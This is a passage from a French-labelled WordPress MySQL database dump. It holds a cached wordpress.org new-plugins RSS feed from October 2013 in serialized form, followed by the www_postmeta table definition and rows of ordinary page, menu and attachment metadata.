service.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"QxMD\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:17:\"WP Business Hours\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"http://wordpress.org/plugins/wp-business-hours/#post-59650\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 20 Oct 2013 07:46:15 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"59650@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:119:\"This Plugin is to show Business hours, Admin can manage the business hours Weekly, can show using widget and shortcode.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"Mejar\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"hearthis.at\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"http://wordpress.org/plugins/hearthisat/#post-59701\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 22 Oct 2013 12:36:19 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"59701@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:147:\"The hearthis.at Shortcode plugin allows you to integrate a player widget from hearthis.at into your Wordpress Blog by using a Wordpress shortcodes.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"hearthis\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Timber Debug Bar\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"http://wordpress.org/plugins/debug-bar-timber/#post-59691\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 22 Oct 2013 03:32:41 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"59691@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"Adds a Panel to the Debug Bar for Timber information\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"jarednova\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"WP-Parsi Statistics\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"http://wordpress.org/plugins/wp-parsi-statistics/#post-59625\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 19 Oct 2013 09:11:38 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"59625@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:128:\"This plugin provide you full statistic of your site. You can show statistics with widget or many usefull function in your theme.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"AliRezaPro\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"wp-turbolinks\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"http://wordpress.org/plugins/wp-turbolinks/#post-59621\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 19 Oct 2013 00:26:45 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"59621@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"Turbolinks extracted from Rails, for use with WordPress.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"keita_kobayashi\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:17:\"Hopos Slider Lite\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"http://wordpress.org/plugins/hopos-slider-lite/#post-59794\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 24 Oct 2013 00:04:32 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"59794@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:128:\"Hopos Slider Lite - Responsive Wordpress Plugin is highly customizable and flexible. Can be used any post type and any taxonomy.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"srvalle\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:10;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"HTML5 Video gallery and Player\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"http://wordpress.org/plugins/html5-videogallery-plus-player/#post-59802\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 24 Oct 2013 07:26:31 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"59802@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:95:\"A quick, easy way to add responsive HTML5 Video gallery and Video player  to Wordpress website.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"anoopranawat\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:11;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"SAPE Links\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"http://wordpress.org/plugins/ram108-sape/#post-59732\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 22 Oct 2013 20:26:55 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"59732@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:96:\"SAPE.RU: Adds widget and shortcode to integrate sape.ru contextual links for Russian webmasters.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"ram108\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:12;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:38:\"WooCommerce Sequential Invoice Numbers\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"http://wordpress.org/plugins/woocommerce-sequential-invoice-numbers/#post-59332\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 11 Oct 2013 12:11:58 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"59332@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"Provides sequential invoice numbers for WooCommerce orders\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Gabriel Reguly\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:13;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"Disable Automatic Updates\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"http://wordpress.org/plugins/disable-automatic-updates/#post-59844\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 25 Oct 2013 15:16:25 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"59844@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:95:\"This plugin disables automatic updates feature in WordPress 3.7+, which is enabled by default..\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:8:\"oneTarek\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:14;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:37:\"Background Updates for Major Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:78:\"http://wordpress.org/plugins/background-updates-for-major-releases/#post-59847\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 25 Oct 2013 16:56:45 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"59847@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:85:\"Enables background updates for major releases.  No settings, just activate and enjoy.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:17:\"Aaron D. Campbell\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}s:27:\"http://www.w3.org/2005/Atom\";a:1:{s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:4:\"href\";s:41:\"http://wordpress.org/plugins/rss/view/new\";s:3:\"rel\";s:4:\"self\";s:4:\"type\";s:19:\"application/rss+xml\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";a:7:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Sun, 27 Oct 2013 14:21:39 GMT\";s:12:\"content-type\";s:23:\"text/xml; charset=UTF-8\";s:10:\"connection\";s:5:\"close\";s:4:\"vary\";s:15:\"Accept-Encoding\";s:13:\"last-modified\";s:29:\"Tue, 22 Oct 2013 13:54:01 GMT\";s:4:\"x-nc\";s:11:\"HIT lax 250\";}s:5:\"build\";s:14:\"20130523180038\";}', 'no'),
(2856, 'db_upgraded', '', 'yes');

-- --------------------------------------------------------

--
-- Structure de la table `www_postmeta`
--

CREATE TABLE `www_postmeta` (
  `meta_id` bigint(20) UNSIGNED NOT NULL,
  `post_id` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `www_postmeta`
--

INSERT INTO `www_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1846, 452, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1847, 452, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(4, 5, '_edit_last', '1'),
(5, 5, '_edit_lock', '1383585562:1'),
(6, 5, '_wp_page_template', 'default'),
(7, 9, '_edit_last', '1'),
(8, 9, '_edit_lock', '1383471745:1'),
(9, 9, '_wp_page_template', 'default'),
(10, 11, '_edit_last', '1'),
(11, 11, '_edit_lock', '1383585762:1'),
(12, 11, '_wp_page_template', 'default'),
(1485, 388, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1484, 388, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1483, 388, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1379449550:2\";}\";'),
(1482, 388, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"2\";}\";'),
(50, 20, '_edit_lock', '1383585801:1'),
(1669, 426, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1668, 426, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1667, 426, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383472388:1\";}\";'),
(1666, 426, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(49, 20, '_edit_last', '1'),
(31, 15, '_menu_item_type', 'post_type'),
(32, 15, '_menu_item_menu_item_parent', '0'),
(33, 15, '_menu_item_object_id', '5'),
(34, 15, '_menu_item_object', 'page'),
(35, 15, '_menu_item_target', ''),
(36, 15, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(37, 15, '_menu_item_xfn', ''),
(38, 15, '_menu_item_url', ''),
(51, 20, '_wp_page_template', 'default'),
(40, 16, '_menu_item_type', 'custom'),
(41, 16, '_menu_item_menu_item_parent', '0'),
(42, 16, '_menu_item_object_id', '16'),
(43, 16, '_menu_item_object', 'custom'),
(44, 16, '_menu_item_target', ''),
(45, 16, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(46, 16, '_menu_item_xfn', ''),
(47, 16, '_menu_item_url', 'http://www2.crosstrainingcenter.be/'),
(52, 22, '_edit_last', '1'),
(53, 22, '_edit_lock', '1383585395:1'),
(54, 22, '_wp_page_template', 'default'),
(55, 24, '_menu_item_type', 'post_type'),
(56, 24, '_menu_item_menu_item_parent', '0'),
(57, 24, '_menu_item_object_id', '22'),
(58, 24, '_menu_item_object', 'page'),
(59, 24, '_menu_item_target', ''),
(60, 24, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(61, 24, '_menu_item_xfn', ''),
(62, 24, '_menu_item_url', ''),
(64, 25, '_menu_item_type', 'post_type'),
(65, 25, '_menu_item_menu_item_parent', '0'),
(66, 25, '_menu_item_object_id', '20'),
(67, 25, '_menu_item_object', 'page'),
(68, 25, '_menu_item_target', ''),
(69, 25, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(70, 25, '_menu_item_xfn', ''),
(71, 25, '_menu_item_url', ''),
(86, 68, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:16:\"2013/06/trx1.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"trx1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),
(85, 68, '_wp_attached_file', '2013/06/trx1.jpg'),
(87, 70, '_wp_attached_file', '2013/06/kb.jpg'),
